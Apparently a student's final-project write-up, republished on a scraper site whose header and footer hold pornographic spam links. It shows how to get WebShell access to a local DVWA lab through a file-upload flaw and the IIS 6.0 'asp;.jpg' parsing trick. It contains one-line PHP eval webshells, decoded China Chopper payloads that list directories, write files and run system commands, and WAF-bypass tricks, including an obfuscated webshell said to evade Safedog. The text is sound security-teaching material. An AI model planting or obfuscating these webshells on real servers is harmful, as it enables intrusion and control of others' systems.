日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

發布時間:2025/4/9 编程问答 64 豆豆
生活随笔 收集整理的這篇文章主要介紹了 2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

2017-2018-2 『網絡對抗技術』Final:Web滲透獲取WebShell權限

————————CONTENTS————————

  • 一.Webshell原理
    • 1.什么是WebShell
    • 2.WebShell的特點
  • 二.滲透工具簡介
    • 1.中國菜刀
    • 2.御劍后臺掃描工具
  • 三.web應用程序配置

  • 四.練習:利用DVWA文件上傳漏洞獲取WebShell權限

  • 五.中國菜刀原理剖析
    • 1.目錄顯示
    • 2.文件上傳
    • 3.虛擬終端
  • 六.淺析如何繞過WAF

  • 寫在最后:WebShell實踐總結及本學期學習感想

  • 附:參考資料


一.Webshell原理及簡介

1.什么是WebShell

WebShell,顧名思義:web指的是在web服務器上,而shell是用腳本語言編寫的腳本程序,WebShell是web的一個管理工具,可以對web服務器進行操作的權限,也叫WebAdmin。

WebShell一般是被網站管理員用于網站管理、服務器管理等等一些用途,但是由于WebShell的功能比較強大,可以上傳下載文件,查看數據庫,甚至可以調用一些服務器上系統的相關命令(比如創建用戶,修改刪除文件之類的),通常被黑客利用,黑客通過一些上傳方式,將自己編寫的WebShell上傳到web服務器的頁面的目錄下,然后通過頁面訪問的形式進行入侵,或者通過插入一句話連接本地的一些相關工具直接對服務器進行入侵操作。

WebShell根據腳本可分為:PHP腳本木馬、ASP腳本木馬,也有基于.NET的腳本木馬和JSP腳本木馬。除此之外,還有用Python腳本語言寫的動態網頁,因此也有與之相關的WebShell。

根據功能可分為:大馬和小馬。小馬通常指一句話木馬,例如:<%eval request(“pass”)%>通常把這句話寫入一個文檔里面,然后文件名改成xx.asp。然后傳到服務器上面。這里eval方法將request(“pass”)轉換成代碼執行,request函數的作用是應用外部文件。這相當于一句話木馬的客戶端配置。而大馬具有更強大的功能,例如查看并操作服務器端文件等。

2.WebShell的特點

WebShell后門文件具有隱蔽性強、功能強、危害大等特點。WebShell與正常的網頁程序一樣,通過HTTP或者HTTPS協議訪問。由于使用與被控制服務器相同的web服務端口傳輸,因此不會被防火墻攔截。通過WebShell訪問不會在系統日志中留下記錄,只會在web網站的web日志中留下一些數據提交記錄。高級的WebShell程序僅會在web日志中出現GET或者POST的操作,不會有具體的后門操作信息,因此較難發現,隱蔽性強。

目前,WebShell后門程序功能強大,除了文件操作和數據庫操作之外,還可以提權,配合特定程序穿透內網,危害性較大。在通常情況下,通過WebShell可以實現讀取數據庫、導出數據庫文件、查看服務器具有訪問權限的所有文件等功能。在具有MySQL root賬號、MSSQL sa賬號等情況下,可以直接提升,獲得操作系統權限,通過執行特定程序實現如中轉、木馬植入等功能。

返回目錄


二.滲透工具簡介

1.中國菜刀

“中國菜刀”的英文名為“chopper”,是一款專業的網站管理軟件,用途廣泛,使用方便,小巧實用。只要支持動態腳本的網站,都可以用中國菜刀來進行管理。同樣地,攻擊者可利用該工具進行一些WebShell操作,從而實現對服務器文件的控制。

中國菜刀支持的服務端腳本:PHP、ASP,主要用于連接一句話木馬。主要功能有:文件管理(有足夠的權限時候可以管理整個磁盤/文件系統),數據庫管理,虛擬終端。當后門被上傳到服務器端之后,只需要知道后門的具體位置和連接密碼等相關信息,就可以執行腳本發起攻擊。

  • Step1:“中國菜刀”可以在其官網http://www.maicaidao.co下載:

點擊“忽略此風險”,即可進入下載界面,在本地解壓:

  • Step2:雙擊“caidao”可執行文件打開軟件,彈出界面如下所示:

右擊,在彈出的快捷菜單中選擇“添加”命令,即可添加shell地址。如下圖所示。

在“地址”文本框中輸入一句話木馬的shell地址,在“地址”文本框后面的文本框中輸入一句話木馬的連接密碼,在“配置”區域選擇腳本類型(程序會自動識別腳本類型),最后點擊“添加”按鈕,完成添加:

  • Step3:雙擊剛剛添加的shell的地址,即可連接該后門。如果后門執行成功,則會顯示網站的目錄結構和文件等信息,如下圖所示:

可以看到,目標服務器端的目錄結構、文件名稱、時間、大小以及讀取權限都一覽無余了......

  • Step4:除了可以獲取文件信息之外,在文件處右擊還有更多針對文件的可供選擇的操作:刪除、復制、重命名、修改文件夾時間、新建等等。其中,攻擊者可以利用“上傳文件”功能將更多大馬傳到服務器,完成更多的滲透攻擊。

功能好強大!那怎樣做才能查看甚至操作服務器端的文件呢?在后面的實戰中再詳細介紹~

返回目錄

2.御劍后臺掃描工具

御劍后臺掃描工具是為眾多從事網絡工作并擔任網絡安全管理職位的人制作的一款后臺安全掃描工具,它能幫助實時監控后臺文件的安全性,防御網站風險,為網站的正常運作提供最大的保障。但另一方面,御劍掃描枚舉可能的后臺路徑這一行為,也為攻擊者爆庫和利用漏洞進入后臺提供了便利。

  • Step1:在https://u14147674.ctfile.com/fs/14147674-235576201可下載到該工具,在本地解壓:

  • Step2:雙擊“御劍后臺掃描工具”可執行文件打開軟件,彈出界面如下所示:

在“域名”輸入框中填入要掃描的后臺地址,在下方可對掃描線程以及掃描時間進行設置。設置完畢,點擊“開始掃描”即可開始掃描。

這個工具到底有什么用呢?我們一起來試試看...

找來一個網站進行練習:http://demo.testfire.net/【這是一個真實的網站環境,但專門用于模擬滲透測試,所以不用擔心被請喝茶喔】

在“域名”輸入網址http://demo.testfire.net/,開始掃描。掃描結果如下:

HTTP響應值為200,代表頁面可以訪問。點擊這個鏈接http://demo.testfire.net/admin/login.aspx,進入了后臺管理的界面:

得到了這個界面,就可以進行下一步滲透測試啦~

返回目錄


三.web應用程序配置

有很多有漏洞的應用程序,我們可以用來以學習為目的練習滲透測試。下面是一些應用程序:

Damn Vulnerable Web Applications (DVWA): 基于PHP, Apache以及MySQL,需要安裝到本地。

OWASP WebGoat: J2EE web 應用程序,需要在本地運行。

Hack This Site:在線學習滲透測試的網站。

Testfire: 在線學習滲透測試的網站。

下面,我們將學習如何在虛擬機中安裝有漏洞的運行程序。在這個練習中,我們將配置Damn Vulnerable Web Application (DVWA)。這個應用程序有若干基于web的漏洞,比如跨站腳本 (XSS), SQL注入, CSRF,命令注入等。

DVWA(Damn Vulnerable Web Application)是一個用來進行安全脆弱性鑒定的PHP/MySQL Web應用,旨在為安全專業人員測試自己的專業技能和工具提供合法的環境,幫助web開發者更好的理解web應用安全防范的過程。

安裝并運行web服務器的步驟如下:

  • Step1:下載XAMPP,網址為:https://www.apachefriends.org/download.html;對于Windows XP,可以在這里https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/xampp-win32-1.8.2-6-VC9-installer.exe/download下載XAMPP。

  • Step2:雙擊可執行文件進行安裝,一路next,除了路徑選擇之外并沒有什么需要特別注意的。

  • Step3:打開安裝目錄,可以找到如下三個可執行文件:

先雙擊“xampp_start”啟動:

再雙擊“xampp-control”打開xampp的控制面板。點擊“start”開啟Apache和MySQL的服務:

  • Step4:在http://www.dvwa.co.uk/下載DVWA應用程序,解壓到一個新的文件夾里,命名為“dvwa”。

  • Step5:打開“C:\xampp\htdocs”文件夾,把該文件夾里的內容移動到另外一個地方。把“dvwa”文件夾拷貝到C:\xampp\htdocs目錄下。

  • Step6:在瀏覽器的地址欄中輸入http://127.0.0.1/dvwa/login.php,會出現“Database Setup”數據庫設置界面:

  • Step7:到“C:\xampp\htdocs\dvwa\config”文件夾下,用記事本打開“config.inc”文件,移除“db_password”的值:

  • Step8:回到瀏覽器,刷新頁面,會顯示一個登錄頁面。輸入默認的用戶名和口令如“admin/password”,登錄應用程序:

至此,我們成功配置了一個web服務器并在其上安裝了一個應用程序。接下來就可以訪問http://127.0.0.1/dvwa/login.php開始攻擊練習了。

返回目錄


四.練習:利用DVWA文件上傳漏洞獲取WebShell權限

攻擊原理:web容器的解析漏洞,以及配合解析漏洞上傳木馬。

下面以最簡單的一句話木馬為例,進行測試:

使用用戶名admin和密碼password登錄DVWA,在左側選擇“File Upload”。

編寫一句話測試腳本OneCode.php,內容為:

<?php @eval($_POST['apple']); ?>

瀏覽并選擇此木馬文件:

點擊“Upload”,卻發現上傳失敗了:

提示Your image was not uploaded. We can only accept JPEG or PNG images.,emmmmmmm...看來為了避免木馬腳本的攻擊,服務器對上傳文件格式進行了限制。

我們按照要求,上傳一個正常的“JPEG or PNG images”試試看:

成功了。那么作為攻擊者的我們,就應該考慮:如果將木馬文件重命名為圖片文件,是否可以上傳呢?

實踐證明,這種思路是可以完成上傳的。但上傳并不是我們的最終目的,圖片格式的木馬并不利于我們進一步執行腳本。還有沒有其他的思路呢?使其既能上傳,也能執行呢?

查閱資料了解到,DVWA網站服務器使用的是IIS 6.0的web容器。而IIS6.0有一個很著名的漏洞:文件解析漏洞

如何利用IIS 6.0的解析漏洞呢?

IIS 6.0解析利用方法有兩種

  • 目錄解析:

/xx.asp/xx.jpg

在網站下建立文件夾的名字為.asp、.asa 的文件夾,其目錄內的任何擴展名的文件都被IIS當作asp文件來解析并執行。

如果創建目錄 wooyun.asp,那么/wooyun.asp/1.jpg將被當作asp文件來執行。假設攻擊者可以控制上傳文件夾路徑,不管上傳后的圖片改不改名,就都能拿shell了。

  • 文件解析:

wooyun.asp;.jpg

在IIS6.0下,分號后面的不被解析,也就是說wooyun.asp;.jpg會被服務器看成是wooyun.asp。

根據上面的解釋,在這里,我們將一句話測試腳本OneCode.php重命名為OneCode.php;.jpg再次嘗試上傳:

點擊“Upload”,成功上傳:

同時我們可以看到給出了腳本所在的相對路徑:../../hackable/uploads/OneCode.php;.jpg。

一句話木馬通常與需要與一句話木馬相應的客戶端同時使用,才能實現對服務器的控制。這時候就需要用到我們之前提到的“中國菜刀”工具了。

下面嘗試連接這個一句話木馬。

打開菜刀工具,添加一個shell,其中地址可根據給出的相對路徑得到:http://192.168.130.132/dvwa/hackable/uploads/OneCode.php;.jpg,后面的連接密碼填腳本中寫的“apple”,腳本類型為“PHP(Eval)”,添加。

雙擊這個shell,成功獲取到了服務器端的全部文件:

在某些情況下,服務器對上傳文件大小會有限制,因此攻擊者往往選擇先上傳比較小的一句話木馬,使用菜刀工具成功連接后再在菜刀工具中上傳更大的木馬,以實現對服務器端全面的控制。

至此,我們就成功利用DVWA文件上傳漏洞獲取到了WebShell權限。

返回目錄


五.中國菜刀原理剖析

在上面的實踐中,我們親身體會到了“中國菜刀”工具的強大之處。那么它是如何進行通信的呢?如何借助已上傳的一句話木馬實現目錄顯示、文件上傳和模擬虛擬終端等功能的呢?

1.目錄顯示

中國菜刀提供了非常方便的文件管理功能,新建連接,雙擊打開連接后,即可看到服務器端文件目錄的界面:

接下來我們檢查一下中國菜刀的通訊網絡流量,通過抓包軟件分析器服務器和客戶端的通訊情況,如下圖所示,可以看出客戶端在80端口上,以HTTP POST方式通訊:

利用抓包軟件Wireshark的“跟蹤流”功能可以看到整個TCP數據交互過程。如下圖所示,上面紅色部分為攻擊者POST提交控制命令的內容,下面藍色部分為被控端返回結果:

我們將關注點放在攻擊者控制代碼部分,打開這個包:

可見攻擊者為了防止特殊字符傳輸失敗的異常,代碼經過了Base64編碼。內容為:

apple=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=QzpcXDIwMTU1MzAzXFw%3D

最前面的部分為經過url編碼的數據,解碼之后為:apple=@eval(base64_decode($_POST[z0]));,意為將z0數據以POST的方式提交,并使用Base64解碼,最后再解析為腳本執行。

接下來我們看看z0代表的參數的值。將“&z0=”后面的部分解碼并格式化,結果為:

@ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("|<-");; $D=base64_decode($_POST["z1"]); $F=@opendir($D); if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t"$E."";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);}; echo("|<-"); die(); &z1=C:\\20155303\\

通過查詢手冊,具體分析關鍵函數及參數的含義:

  • @ini_set("display_errors","0");臨時關閉PHP的錯誤顯示功能;
  • @set_time_limit(0);防止上傳文件大馬時,會產生超時;
  • @set_magic_quotes_runtime(0);magic_quotes_runtime 是php.ini里的環境配置變量,0和false表示關閉本功能,1和true表示打開本功能。當magic_quotes_runtime打開時,所有外部引入的數據庫資料或者文件等都會自動轉為含有反斜線溢出;
  • echo("|<-");一個簡單的打印;
  • $D=base64_decode($_POST["z1"]);設置變量D為目錄句柄,內容為POST提交的z1。z1參數的具體值在最后面進行了說明:&z1=C:\\20155303\\;
  • $F=@opendir($D); opendir() 函數打開一個目錄句柄,可由 closedir(),readdir() 和 rewinddir() 使用。若成功,則該函數返回一個目錄流,否則返回 false 以及一個 error。可以通過在函數名前加上 "@" 來隱藏 error 的輸出;
  • $N=@readdir($F) readdir() 函數返回由 opendir() 打開的目錄句柄中的條目。若成功,則該函數返回一個文件名,否則返回 false;
  • $P=$D."/".$N;返回目錄下的所有文件;
  • $T=@date("Y-m-d H:i:s",@filemtime($P));返回該目錄或文件的時間;
  • @$E=substr(base_convert(@fileperms($P),10,8),-4);以數字方式顯示文件或目錄的權限,其中fileperms() 函數返回文件或目錄的權限,base_convert() 函數在任意進制之間轉換數字;
  • $R="\t".$T."\t".@filesize($P)."\t"$E."";返回指定文件大小的字節數。
  • 從代碼可以清楚地看出,在接收z1=C:\\20155303\\這個參數后,代碼打開指定目錄的句柄,然后進行循環掃描,并附帶上權限、時間、大小、日期這四個參數,用\t制表符拼在一起捆綁發送回客戶端。到客戶端之后,再用string_split之類的函數分開來,循環一一顯示在UI上。

    執行完這些腳本代碼之后,就完成了目錄顯示的功能。

    2.文件上傳

    接下來看看獲取WebShell最重要的功能——上傳文件,這是下一步滲透攻擊的基礎。首先上傳一張圖片:

    這次wireshark抓到了兩組對話,基本內容大概可以猜到了,一個是上傳文件,一個是刷新并顯示目錄。我們先來分析第一個包:

    數據部分為:

    QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskZj1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JGM9JF9QT1NUWyJ6MiJdOyRjPXN0cl9yZXBsYWNlKCJcciIsIiIsJGMpOyRjPXN0cl9yZXBsYWNlKCJcbiIsIiIsJGMpOyRidWY9IiI7Zm9yKCRpPTA7JGk8c3RybGVuKCRjKTskaSs9MikkYnVmLj11cmxkZWNvZGUoIiUiLnN1YnN0cigkYywkaSwyKSk7ZWNobyhAZndyaXRlKGZvcGVuKCRmLCJ3IiksJGJ1Zik/IjEiOiIwIik7O2VjaG8oInw8LSIpO2RpZSgpOw==

    解碼之后的結果為:

    @ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("->|");; $f=base64_decode($_POST["z1"]); $c=$_POST["z2"]; $c=str_replace("\r","",$c); $c=str_replace("\n","",$c); $buf=""; for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2)); echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");; echo("|<-"); die(); &z1=C:\\final\\4?.png

    后面&z2=...部分是所傳圖片以十六進制方式顯示的結果。

    這段代碼最關鍵的部分是最后的fwrite()函數,也就是將我們指定的裝滿數據的緩沖區寫入指定的路徑中。只要Apache用戶在當前目錄下有寫權限,PHP腳本調用windows API時就可以完成寫操作,也就是文件上傳。

    剛才提到文件上傳過程中,客戶端與服務器進行了兩次交互。我們再來看看第二個數據包中的內容:

    解碼之后的內容為:

    @ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("->|");; $f=base64_decode($_POST["z1"]); $c=$_POST["z2"]; $c=str_replace("\r","",$c); $c=str_replace("\n","",$c); $buf=""; for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2)); echo(@fwrite(fopen($f,"w"),$buf)?"1":"0");; echo("|<-"); die();

    可以看出,跟我們之前分析過的“顯示目錄”部分的腳本代碼大同小異。這部分代碼功能就是在上傳文件之后,對文件目錄進行刷新,顯示出剛剛上傳的文件。

    3.虛擬終端

    這個功能更加神奇了,效果跟我們攻擊成功獲得的cmd shell一樣:

    我們試著分析一下它的原理。先運行一個dir命令,抓包如下:

    同樣地將數據部分解碼,得到:

    @ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("->|");; $p=base64_decode($_POST["z1"]); $s=base64_decode($_POST["z2"]); $d=dirname($_SERVER["SCRIPT_FILENAME"]); $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\""; $r="{$p} {$c}"; @system($r." 2>&1",$ret); print ($ret!=0)?" &z1=cmd &z2=cd /d "C:\xampp\htdocs\dvwa\hackable\uploads\"&dir&echo [S]&cd&echo [E]

    查找手冊,看看關鍵函數如何使用:

  • dirname()返回路徑中的目錄部分;
  • $_SERVER["SCRIPT_FILENAME"]當前執行腳本的絕對路徑,獲取后供dir命令等使用;
  • substr()返回字符串的一部分;
  • $c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";這是一段正則表達式,用捕獲分組獲得字符串中的參數,這里也就是 cd /d C:\xampp\htdocs\dvwa\hackable\uploads、 dir、 echo、 cd、 echo。
  • @system($r." 2>&1",$ret);本函數就像是C中的函數system(),用來執行指令,并輸出結果。若是 return_var 參數存在,則執行 command 之后的狀態會填入 return_var 中;
  • 也就是說,我們指定的命令會傳入system函數中執行,并輸出結果。

    返回目錄


    六.淺析如何繞過WAF

    前面學習了一些常見WebShell滲透工具的工作機制,但都是基于沒有防火墻的網站,這顯然不符合真實的場景。因此,掌握繞過各類WAF可以說是滲透測試人員的一項基本技能。

    目前市場上的WAF主要有以下幾類:

    • 以安全狗為代表的基于軟件WAF
    • 百度加速樂、安全寶等部署在云端的WAF
    • 硬件WAF

    考慮到實際情況,我們主要針對安全狗繞過進行簡要分析。

    在安全狗官網下載軟件并安裝,注意區分IIS版和Apache版。

    安裝之后,對網站文件目錄進行掃描。這里我們直接掃描已經上傳過大馬和小馬的環境,結果如下:

    可以看出,安全狗成功檢測出了網站存在的大馬和小馬。那么,如何繞過WAF上傳木馬呢?

    1.大小寫轉換法:

    在某些WAF中,使用的正則存在缺陷,比如沒有使用大小寫轉換函數,因此可根據這個漏洞編寫大馬或小馬,如:

    SQL:sEleCt vERsIoN(); ??XSS:<sCrIpt>alert(1)</script>

    2.字符編碼法:

    常見的SQL編碼有unicode、HEX、URL、ascll、base64等,XSS編碼有:HTML、URL、ASCII、JS編碼、base64等等。

    可以通過利用瀏覽器上的進制轉換或語言編碼規則來繞過WAF,如:

    SQL:load_file(0x633A2F77696E646F77732F6D792E696E69) ????XSS:<script%20src%3D"http%3A%2F%2F0300.0250.0000.0001"><%2Fscript>

    3.字符拼湊法:

    如果過濾了某些字符串,我們可以在他們兩邊加上“原有字符串”的一部分。

    在這里利用了WAF的不完整性,只驗證一次字符串,或過濾的字符串并不完整,如:

    SQL:selselectect verversionsion(); ????XSS:<scr<script>rip>alalertert</scr</script>rip>

    4.關鍵字替換法:

    部分WAF是通過黑名單來起到攔截的作用的,將某些函數放入黑名單,從而實現攔截。這種情況下,可以使用關鍵字替代來實現繞過。

    比如在MySQL中,WAF將sleep()函數列入黑名單,可以通過具備相同功能的benchmark()函數來實現繞過。下面列舉了一些功能相同的替代函數:

    < > 等價于 BETWEEN= 等價于 likeHex() bin() 等價于ascii()Sleep() 等價于 benchmark()Mid()substring() 等價于 substr()@@user 等價于 User()@@Version 等價于 version()

    5.空白符繞過法

    基于正則表達式的WAF,SQL諸如規則使用正則表達式的“\s”匹配空格,例如:select\s+union。

    利用空白字符進行繞過,例如union select被攔截,只需要把中間空白字符替換為%250C,%25A0等進行繞過。

    union%250Cselect union%25A0select

    再比如我們前面提到的一句話木馬:

    <?php @eval($_POST['apple']); ?>

    在一開始就會被攔截:

    要想繞過WAF,我們要做的就是對一句話木馬進行變形,不外乎就是拆分替換、反序列化、動態函數(比如$_GET['function']($_POST['Cknife']);)使用回調函數(比如usort、array_map)、使用匿名函數、使用特定函數(比如create_function,asset)等等。

    我們首先嘗試使用匿名函數,用create_function創建了一個匿名函數chopper,用它來代替eval。如下為代碼變形后的一句話木馬:

    <?php $chopper = create_function('$a', 'eval($a);'); $chopper($_POST['chopper']); ?>

    仍然會被安全狗檢測出來,這是因為構造的匿名函數$chopper中也包含了eval關鍵詞,所以被查殺。

    再使用拆分法,把eval拆分為ev和al,再在有引號的參數前面加入stripslashes函數去除轉移符號,即修改為:

    <?php$chopper = create_function('$a', 'ev'.'al($a);');$chopper(stripslashes($_POST['chopper']));?>

    再次提交并嘗試連接,就可以成功啦~

    總之,繞過WAF就是不停嘗試WAF的檢測規則,由于WAF不能對正常的文件進行攔截,若過濾規則過于嚴格,會對網站正常訪問產生影響。作為攻擊者,就需要找到檢測規則的漏洞,既能繞過WAF,又能實現代碼本來的攻擊功能。

    返回目錄


    寫在最后:WebShell實踐總結及本學期學習感想

    WebShell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種命令執行環境,也可以將其稱做為一種網頁后門。黑客在入侵了一個網站后,通常會將asp或php后門文件與網站服務器WEB目錄下正常的網頁文件混在一起,然后就可以使用瀏覽器來訪問asp或者php后門,得到一個命令執行環境,以達到控制網站服務器的目的。顧名思義,“web”的含義是顯然需要服務器開放web服務,“shell”的含義是取得對服務器某種程度上操作權限。WebShell常常被稱為入侵者通過網站端口對網站服務器的某種程度上操作的權限。由于webshell其大多是以動態腳本的形式出現,也有人稱之為網站的后門工具。

    在本次實踐中,我了解了WebShell相關的知識,學習了大馬小馬的編寫方式,還嘗試使用了獲取WebShell的常用工具,并對其實現機理進行了深入分析,最后上述基礎上,搭建網站,部署WAF,并學習了繞過WAF的幾種方式。整體來看,如何通過WebShell完成一次成功的攻擊,這個脈絡還是比較清晰的。入手點以及需要考慮的問題主要有以下幾個:第一,木馬如何編寫?在滲透之前,首先要明白自己目的何在。上傳大馬還是小馬?是顯示后臺目錄還是執行某些命令?一些網站會對上傳文件的大小進行限制,這就需要先上傳簡單的一句話木馬,再通過工具上傳更大的木馬了。第二,如何上傳木馬?出于安全性考慮,一般網站并不允許上傳一些疑似木馬的文件,這就需要尋找存在的漏洞進行上傳。針對IIS 6.0而言,我們可以利用文件解析漏洞實現上傳。第三,上傳之后,如何控制我們上傳的腳本文件,讓其完成功能?如果已經上傳了大馬,直接訪問大馬的腳本網頁即可;如果是一句話木馬,就需要先使用中國菜刀等工具進行連接,再進行后續操作。連接時還需要考慮,如何繞過WAF呢?把以上三個步驟都實現了,控制網站服務器的目的也就達成了。

    為什么當時會選擇免考呢?跟其他課程不同,《網絡對抗技術》這門課從開始到結束都是以實踐貫穿的,無論是逆向破解、后門、免殺,還是MSF使用、網絡欺詐等等,都是在不斷動手動手動手動手動手動手動手的過程中掌握知識的。所以哈,雖然每次實驗都做得很舒服很帶感很刺激,但如果期末以卷面形式考,還真跟平時實踐不是一種感覺呢......善始善終吧,多么有趣的一門課,那就以一個有趣的實踐,而不是枯燥的卷面考試,來為一學期的努力畫上句號咯。

    為什么要選WebShell這個主題?emmmmmmmmm...WebShell這個方向,在九次實驗中并沒有涉及,其實本來打算深化其中一個實驗的內容的,但在劉老師的建(song)議(yong)之下,憑著自己對未知的興趣,就勇敢地來嘗試新鮮事物啦!在實踐的過程中還是走了不少彎路的,艱苦卓絕的自學之旅從圖書館借書開始。一邊讀一邊查一邊試,漸漸摸出了門路,知道了滲透的基本流程是怎樣的。但剛開始也僅僅局限于科普的程度而已。之后每學會一點完成一點,就去向劉老師請教并探討進一步的方向,非常感謝老師不厭其煩的講解和啟發!!!從環境的正確搭建,到對工具原理的深入剖析,在“提問——思考——動手——領悟——再提問”這個循環中,漸漸對這個實踐主題有了更加深刻的理解。

    總之,為期五個月的,以實踐貫穿始終的『網絡對抗技術』課程就告一段落啦。九個實驗+期末免考項目,這門課程帶給了我不一樣的體會。以前聽婁老師課的時候,總有同學抱怨老師上課講的少,可能還是沒有適應這種動手的學習方式吧,總寄希望于按照PPT背誦期末拿高分。但對于這門課,不動手就無法拿到一丁點分數。老師能布置一些有趣的實驗調動同學們的積極性,改變對“動手”的抵觸心理,實在是難能可貴~希望在今后的學習中,能不忘初心,不忘專業對我們的要求,繼續鍛煉實踐能力,在信息安全這條道路上越走越遠吧!

    返回目錄


    附:參考資料

    • 應用層面的攻擊:WEB攻擊
    • 解析漏洞總結
    • 【滲透測試網站】Altoro Mutual
    • 最新webshell大合集
    • 新版中國菜刀20160620初體驗
    • 新手指南:手把手教你如何搭建自己的滲透測試環境
    • Webshell實現與隱藏探究
    • 使用XAMPP和DVWA在Windows7上搭建滲透測試環境
    • 明小子注入工具+啊D注入工具+御劍后臺掃描工具+中國菜刀一句話木馬
    • 利用IIS6.0解析漏洞拿webshell(一)
    • 詳解藍科CMS漏洞批量拿shall教程
    • 御劍后臺掃描工具 v1.5珍藏版
    • 淺談WAF繞過技巧
    • 御劍web后臺敏感目錄掃描

    轉載于:https://www.cnblogs.com/Vivian517/p/9231406.html

    總結

    以上是生活随笔為你收集整理的2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    午夜视频免费在线观看 | 伊人国产在线观看 | 亚洲电影图片小说 | 天天操夜夜想 | 国产免费高清视频 | 亚洲一级在线观看 | 色九九在线 | 欧美在线一二区 | 日韩av影视在线观看 | 男女视频国产 | 91久久久久久国产精品 | 成人a视频在线观看 | 天天操天天干天天综合网 | 字幕网在线观看 | 日本中文字幕在线看 | 99久久精品免费看国产一区二区三区 | 91在线视频网址 | 97成人在线免费视频 | 91视频中文字幕 | 日韩和的一区二在线 | .国产精品成人自产拍在线观看6 | 日韩一区二区三免费高清在线观看 | 免费能看的黄色片 | 婷婷六月综合亚洲 | 毛片www | 成人av在线看 | 天天爽天天射 | 一本一本久久a久久精品综合 | 亚洲午夜精品久久久 | 国产福利一区二区三区在线观看 | 午夜视频在线观看一区二区三区 | 色婷婷综合五月 | 欧美综合色在线图区 | 伊人亚洲综合 | 911av视频| 成人a视频片观看免费 | 日日摸日日添夜夜爽97 | 永久免费精品视频网站 | 91在线免费播放视频 | 国产区精品区 | 欧美一区免费观看 | 区一区二区三在线观看 | 欧美激情视频久久 | 欧美日韩三区二区 | 91黄色在线视频 | 又湿又紧又大又爽a视频国产 | 91视频免费视频 | 色播五月激情五月 | 国产一区二区在线观看视频 | 狠狠操狠狠插 | 国产在线探花 | 免费观看成人 | 国产精品2020 | 久久精品这里都是精品 | 超碰人人av | 国偷自产视频一区二区久 | av大全免费在线观看 | 婷婷久久五月天 | 五月天伊人网 | 大荫蒂欧美视频另类xxxx | 国产色a在线观看 | 中文字幕 国产视频 | 久久精品视频4 | 一区二区三区四区五区六区 | 成人观看视频 | 91免费黄视频 | 亚洲久草视频 | 欧美成人一二区 | 午夜久久影院 | 久久短视频 | 91精品欧美| 97色在线观看免费视频 | av电影免费在线播放 | 美女网站在线观看 | 天天干,狠狠干 | 欧美性猛片, | 狠狠干成人综合网 | 久久夜色精品国产欧美乱 | 6080yy午夜一二三区久久 | 五月天婷婷在线观看视频 | 亚洲黄色小说网 | 中文字幕美女免费在线 | 亚洲精品乱码久久久久久蜜桃欧美 | 美女视频黄免费网站 | 中文字幕专区高清在线观看 | 精品免费久久久久久 | 午夜精品一区二区三区视频免费看 | 天天操福利视频 | 欧美日韩亚洲在线观看 | 在线观看91精品视频 | 免费精品在线 | 欧美疯狂性受xxxxx另类 | 91麻豆视频 | 久草在线免费新视频 | 99精品黄色片免费大全 | 在线中文字母电影观看 | 7777xxxx| 国产高清在线看 | 伊人婷婷色 | 日韩专区一区二区 | 成片免费观看视频大全 | 国产精品久久久99 | 精品国产一区二区三区免费 | 国产精品成人一区二区三区 | 亚洲成av人电影 | 丁香六月婷婷开心 | 国产成人久久精品77777综合 | 久草视频播放 | 午夜精品久久久久久久99婷婷 | 黄色片网站大全 | 日韩精品无 | 